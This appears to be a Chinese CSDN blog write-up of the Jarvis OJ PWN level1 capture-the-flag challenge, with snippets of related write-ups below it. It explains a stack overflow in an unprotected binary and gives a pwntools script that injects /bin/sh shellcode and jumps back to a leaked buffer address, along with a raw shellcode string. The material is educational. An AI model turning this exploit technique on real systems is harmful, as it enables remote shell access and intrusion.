Jarvis OJ PWN level1

最新推荐文章于 2022-05-14 15:14:41 发布
最新推荐文章于 2022-05-14 15:14:41 发布
阅读量251 收藏
点赞数
分类专栏: pwn 文章标签: pwn CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43409582/article/details/100779010
版权

先看一下保护:
在这里插入图片描述
没开保护。
主函数中没写啥东西。。。
在这里插入图片描述
接着打开主函数中调用的function,
在这里插入图片描述
很明显的一个栈溢出漏洞
发现printf函数直接将我们输入的buf给打印出来了且没有检查输入,而且也没有发现有获得flag和拿shell的操作,再加上什么保护都没开,那么思路就有了:
利用栈溢出漏洞将shellcode写入buf中,并使返回地址返回到buf的首地址(这里因为没有开NX保护所以栈中数据有执行权限)。
我们在本地测试的时候发现他会给你打印出你输入的局部变量的首地址所以我们就可以利用这一点来写脚本了。
exp.py:

from pwn import *
p = remote('pwn2.jarvisoj.com',9877)
#sc = "\xeb\x0b\x5b\x31\xc0\x31\xc9\x31\xd2\xb0\x0b\xcd\x80\xe8\xf0\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68"
shellcode = asm(shellcraft.i386.sh())
buf_addr = int(p.recv()[14:-2],16)
pay = shellcode + 'a'*(0x8c-len(shellcode)) + p32(buf_addr)
p.sendline(pay)
p.interactive()
ch3nwr1d
关注
专栏目录
(Jarvis Oj)(Pwn) level1
Nothing
04-18 1300
(Jarvis Oj)(Pwn) level1 首先用checksec查一下保护。几乎没开什么保护措施。关键的是NX没开,意味着栈上的数据可执行。 用ida反汇编,找到溢出点。 但这次没有找到system函数了,那么该怎么得到shell呢,发现这个函数调用了printf函数,输出了buf的地址,在结合NX保护是关闭的,那么就意味着,如果将shellcode写到buf中,函数返回时跳转...
jarvisoj pwn level5 wp
zszcr的博客
03-26 1974
题目要求练习 mmap和mprotect 函数 不能调用system或者是execv函数来获取shell同时给了可执行文件和libc文件先查了下mmap和mprotect函数是干什么的两个函数原型如下:void* mmap(void* addr, size_t len, int port, int flag, int filedes, off_t off)#mmap(rdi=shellcode_a...
Jarvis OJ level1
九层台
07-06 777
liu@liu-F117-F:~/桌面/oj/level1$ checksec level1 [*] '/home/liu/\xe6\xa1\x8c\xe9\x9d\xa2/oj/level1/level1' Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: ...
JarvisOJ-PWN-Level1
杀生丸?不,其实我要的是桔梗
03-16 873
JarvisOJ-PWN-Level 先checksec一下: 发现NX栈保护没有打开,也就是堆栈代码没有进行保护,那么就就题目很可能就是要输入shellcode在栈里执行吧。 打开IDA分析(32位): 主函数: vulner..fuction()函数: 题目的逻辑是打出buf的首地址然后写入从标准输入100字节给buf。 然后输出Holle world。 我们再看b...
jarvisoj pwn level1
Joey_l的博客
07-31 438
https://www.jarvisoj.com/challenges 拿到程序后先file可知为32位和动态链接 file level1 然后checksec检查保护机制 checksec level1 拖入ida查看,在vulnerable_function()函数的printf()处存在注入点 栈结构: 低地址→高地址 buf→ebp→eip(返回地址) 思路:没有s...
JarvisOJ PWN level1 wp
苗_的博客
01-08 258
level1 checksec看一下保护,几乎没什么保护措施: 先拖进IDA里面看一下(f5大法好),发现栈溢出点: f12没发现"/bin/sh",看一下printf函数会把buf的地址输出出来,我们将它截取,并保存在buf_addr中。由于NX是关闭的状态,也就是说我们把shellcode写进buf里面,函数返回时跳转回buf的位置,就可以执行shellcode了。因此我们把sh...
Jarvis OJ level1
Kni9hT's Blog
11-08 598
要点:使用shellcraft.i386()来编写shellcode 和level0相比,本题没有system函数可以直接调用。 所以我们要发送shellcode来getshell 首先看一下开了哪些保护。(好吧,不出意料是全裸) 然后IDA里面看函数调用,main()函数先调用了vulnerable_function函数。 vulnerable_function: text:0804847B ...
BUUCTF jarvisoj_level0
m0_54262894的博客
10-27 307
先checksec,仅开启了NX保护 运行一下 放入ida中 查看main函数 没有什么关键信息,双击vulnerable_function() 在这里我们看到了漏洞 buf定义了80个字节,而我们可以输入更多的数据 接着找找后门函数 这道题很简单,已经把后门给我们展示出来了 记住后门函数的地址0x400596 做完以上步骤我们就有思路了: 覆盖buf 的80个字节 因为是64位的文件,然后再加8个字节...
(Jarvis Oj)(Pwn) level5
Nothing
05-03 2067
(Jarvis Oj)(Pwn) level5 题目描述:mmap和mprotect练习,假设system和execve函数被禁用,请尝试使用mmap和mprotect完成本题。附件和level3_x64的附件一样。 首先去看看这个mmap函数和mprotect函数是干啥的。 void* mmap(void* addr, size_t len, int port, int flag, int...
日行一PWN jarvisoj_level0
m0_57221101的博客
05-14 203
还是来自于BUUCTF的机器,今天的很简单,就是单纯的考察了read函数的漏洞,以及对64位寄存器的理解 开始 首先还是经典查壳和内存保护,发现啥也没有,是很简单的机器。然后IDA反编译一下,由于是64位的软件所以需要IDA64 main函数 首先可以看到主函数中知识调用了write函数,并输出了Hello, Worldn这么几个字到终端。 之后调用了vulnerable_function函数 因为反汇编并不会给出类似于write这种函数的定义, 所以需要熟悉汇编的同学自行根据效果来
jarvisoj-level1
qq_35661990的博客
11-08 304
先看一下有什么保护 什么保护都没开起来。 放进IDA里看一下 vulnerable_function(); write(1, "Hello, World!\n", 0xEu); return 0; main函数里就三行,进入vulnerable_function()函数看一下 char buf; // [esp+0h] [ebp-88h] printf("W...
PWN_JarvisOJ_Level1
michaelinfinity的博客
03-13 791
首先nc一下 之后我们来看ida反编译 在“Hello,World!\n”之前有一个vulnerable_function,进去之后查看一下这个函数 可以看出来刚刚出现的奇怪的地址是buf的首地址(%p是返回参数地址的),那么我们就要查看一下buf。 从中能看出buf有0x88的字节,并且返回指令在+0004的位置,所以需要填充0x88+4的字节 这个题目中没有syste...
jarvisoj_level1
、moddemod
07-06 383
这题我写这个exp是在ubuntu18的环境下写的,远程和本地的IO交互的数据不太一样,下面的exp在远程可以拿到shell,本地可能需要修改一下… exp from pwn import * from LibcSearcher import * context.log_level = 'debug' proc_name = './level1' p = process(proc_name) # p = remote('node3.buuoj.cn', 29850) elf = ELF(proc_na.
jarvis oj level1
发蝴蝶和大脑斧的博客
12-01 364
还是先checksec Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX disabled PIE: No PIE (0x8048000) RWX: Has RWX segments 发现数据部分可以执行,先看ida,同样是vulnerable处有栈溢...
Jarvis OJlevel1
weixin_43464124的博客
04-22 276
首先介绍一下pwntools的一个用法吧算是。 from pwn import* shellcraft.sh() 然后,pwntools这个只能工具就会帮你写出一串shellcode来。 大致是这样的: u" /* execve(path='/bin///sh', argv=['sh'], envp=0) */\n /* push '/bin///sh\\x00' */\n p...
Jarvis oj level1 wp
ditto的博客
12-30 304
看下防护 啥也没开。 放IDA里看下: 很显然,利用泄露的数组的首地址来写通解,就不用管ASLR了。 exp如下: from pwn import* a=remote("pwn2.jarvisoj.com","9877") a.recvuntil("What's this:") addr=a.recvuntil(&
Jarvis OJ-PWN-[XMAN]level1 wp
分不清东西南北的Laffey
09-26 1145
地址:nc pwn2.jarvisoj.com 9877 第一步:用checksec看开启了哪些保护 32位的 程序编译时关了栈不可执行保护 第二步:用IDA看伪代码 进去之后F5看到主函数 跟进vulnerable_function()函数 第三步:找到溢出点并加以分析 我们需要覆盖函数的返回地址 将其地址覆盖成shellcode的返回地址 这道题不像level0 里面有system函数...
18.9.18 Jarvis OJ PWN----[XMAN]level1
qq_42192672的博客
09-18 225
拖进IDA 这次先是一个vulnerable_function函数,再是一个write函数 查看保护机制,发现没有开启,大佬说保护机制没开启,就可以用shellcode啦 接下来看函数内部 可以看到buf的缓冲区大小为0x100个字节,但是其偏移量是0x88个字节 在0x88个字节中首先要留出shellcode的空间(注意这里是32位的) 最终返回的地址显然也要返回到shell...
Jarvis OJ level1题解
educat0r的博客
02-19 569
题目网址https://www.jarvisoj.com/challenges Pwnlevel1题 首先把文件放入gdb中用checksec分析 分析发现,没有开启NX保护,说明文件内没有包含system(‘/bin/sh’),说明本题需要自己去构造shellcode。NX保护未开启表示着你输入的东西可执行,所以你需要构造shellcode填充数据,然后利用返回地址再次返回这个变量,就可以执...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值